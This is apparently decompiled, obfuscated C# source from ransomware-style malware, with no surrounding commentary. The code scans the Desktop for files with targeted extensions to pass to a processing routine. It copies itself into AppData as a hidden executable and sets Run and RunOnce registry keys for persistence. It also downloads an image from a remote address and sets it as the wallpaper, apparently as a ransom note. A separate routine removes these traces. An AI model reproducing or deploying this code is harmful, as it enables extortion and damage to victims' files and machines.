public void method_23()
{
string text = Delegate120.smethod_0(Environment.SpecialFolder.Desktop);
string[] array = Delegate194.smethod_0(text, "*.*");
for (int i = 0; i < array.Length; i++)
{
string string_ = array[i];
string text2 = Delegate195.smethod_0(string_);
string[] array2 = this.string_6;
for (int j = 0; j < array2.Length; j++)
{
string text3 = array2[j];
if (Delegate98.smethod_1(text3, text2))
{
try
{
this.method_18(string_);
goto IL_63;
}
catch (Exception)
{
goto IL_63;
}
break;
}
IL_63 :;
}
}
}
public void method_11(string string_7)
{
string text = this.method_9(53, "");
string text2 = Delegate88.smethod_0("HKEY_CURRENT_USER\\Software\\", this.string_3, "\\Keys");
string text3 = Delegate125.smethod_0(Delegate120.smethod_0(Environment.SpecialFolder.ApplicationData), "\\", this.string_3, ".img");
try
{
WebRequest object_ = Delegate155.smethod_0(Delegate124.smethod_0(string_7, text));
Delegate157.smethod_0(object_, Delegate156.smethod_0());
HttpWebResponse object_2 = (HttpWebResponse)Delegate158.smethod_0(object_);
BinaryReader object_3 = Delegate31.smethod_0(Delegate159.smethod_0(object_2));
byte[] array = Delegate176.smethod_0(object_3, 10485760);
using (FileStream fileStream = Delegate32.smethod_0(text3, FileMode.Create))
{
Delegate177.smethod_0(fileStream, array, 0, array.Length);
}
byte[] object_4 = Delegate146.smethod_1(text3);
Delegate127.smethod_0(text2, "Wallpaper", object_4, RegistryValueKind.Binary);
Delegate178.smethod_0(object_3);
Delegate163.smethod_0(object_2);
Delegate100.smethod_1(text3);
Delegate104.smethod_0(this.int_1);
}
catch (WebException)
{
}
}
public void method_1()
{
this.method_7();
string text = Delegate120.smethod_0(Environment.SpecialFolder.ApplicationData);
string string_ = Delegate123.smethod_0(Delegate122.smethod_0(Delegate121.smethod_0()));
string text2 = Delegate123.smethod_1(Delegate122.smethod_0(Delegate121.smethod_0()));
string text3 = Delegate124.smethod_0("/F /IM ", text2);
string object_ = Delegate125.smethod_0(text, "\\", this.string_3, ".exe");
this.registryKey_0 = Delegate126.smethod_0(Registry.CurrentUser, Delegate88.smethod_0("Software\\", this.string_3, "\\Files"));
this.registryKey_1 = Delegate126.smethod_0(Registry.CurrentUser, Delegate88.smethod_0("Software\\", this.string_3, "\\Keys"));
if (this.registryKey_1 == null)
{
Delegate127.smethod_0(Delegate88.smethod_0("HKEY_CURRENT_USER\\Software\\", this.string_3, "\\Keys"), "", "", RegistryValueKind.String);
}
if (this.registryKey_0 == null)
{
Delegate127.smethod_0(Delegate88.smethod_0("HKEY_CURRENT_USER\\Software\\", this.string_3, "\\Files"), "", "", RegistryValueKind.String);
}
Delegate127.smethod_0("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", this.string_3, object_, RegistryValueKind.String);
Delegate127.smethod_0("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Delegate124.smethod_0("*", this.string_3), object_, RegistryValueKind.String);
Delegate128.smethod_0(string_, FileAttributes.Hidden);
if (Delegate129.smethod_0(text) && !Delegate129.smethod_1(object_))
{
Delegate104.smethod_0(10000);
try
{
Delegate130.smethod_0(string_, object_);
ProcessStartInfo processStartInfo = Delegate21.smethod_0();
Delegate131.smethod_0(processStartInfo, object_);
ProcessStartInfo processStartInfo2 = Delegate21.smethod_0();
Delegate132.smethod_0(processStartInfo2, false);
Delegate132.smethod_1(processStartInfo2, true);
Delegate131.smethod_0(processStartInfo2, "taskkill");
Delegate131.smethod_1(processStartInfo2, text3);
Delegate133.smethod_0(processStartInfo);
GClass0.MoveFileEx(string_, null, 4);
Delegate133.smethod_0(processStartInfo2);
}
catch (Exception)
{
}
}
}
public void method_24()
{
string text = Delegate120.smethod_0(Environment.SpecialFolder.ApplicationData);
string string_ = Delegate125.smethod_0(text, "\\", this.string_3, ".exe");
string text2 = Delegate125.smethod_0(text, "\\", this.string_3, ".bmp");
string text3 = Delegate124.smethod_0("/F /IM ", Delegate123.smethod_1(Delegate122.smethod_0(Delegate121.smethod_0())));
RegistryKey registryKey = Delegate173.smethod_0(Registry.CurrentUser, "Software", true);
RegistryKey registryKey2 = Delegate173.smethod_0(Registry.CurrentUser, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
RegistryKey registryKey3 = Delegate173.smethod_0(Registry.CurrentUser, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true);
if (registryKey2 != null)
{
Delegate198.smethod_0(registryKey2, this.string_3);
}
if (registryKey3 != null)
{
Delegate198.smethod_0(registryKey3, Delegate124.smethod_0("*", this.string_3));
}
if (registryKey != null)
{
Delegate198.smethod_1(registryKey, this.string_3);
}
if (Delegate129.smethod_1(string_))
{
Delegate128.smethod_0(string_, FileAttributes.Hidden);
GClass0.MoveFileEx(string_, null, 4);
try
{
Delegate100.smethod_1(text2);
}
catch (Exception)
{
}
}
ProcessStartInfo processStartInfo = Delegate21.smethod_0();
Delegate132.smethod_0(processStartInfo, false);
Delegate132.smethod_1(processStartInfo, true);
Delegate131.smethod_0(processStartInfo, "taskkill");
Delegate131.smethod_1(processStartInfo, text3);
Delegate133.smethod_0(processStartInfo);
}
public void method_10()
{
string string_ = Delegate125.smethod_0(Delegate120.smethod_0(Environment.SpecialFolder.ApplicationData), "\\", this.string_3, ".img");
string string_2 = Delegate125.smethod_0(Delegate120.smethod_0(Environment.SpecialFolder.ApplicationData), "\\", this.string_3, ".bmp");
string text = Delegate88.smethod_0("HKEY_CURRENT_USER\\Software\\", this.string_3, "\\Keys");
byte[] byte_ = (byte[])Delegate169.smethod_0(text, "Wallpaper", "Can't receive wallpaper");
Delegate170.smethod_0(string_, byte_);
Bitmap object_ = (Bitmap)Delegate171.smethod_0(string_);
Delegate172.smethod_0(object_, string_2);
GClass0.SystemParametersInfo(20, 0, string_2, 3);
RegistryKey object_2 = Delegate173.smethod_0(Registry.CurrentUser, "Control Panel\\Desktop", true);
Delegate174.smethod_0(object_2, "WallpaperStyle", 0);
Delegate175.smethod_0(object_2);
Delegate128.smethod_0(string_, FileAttributes.Hidden);
Delegate128.smethod_0(string_2, FileAttributes.Hidden);
GClass0.MoveFileEx(string_, null, 4);
}
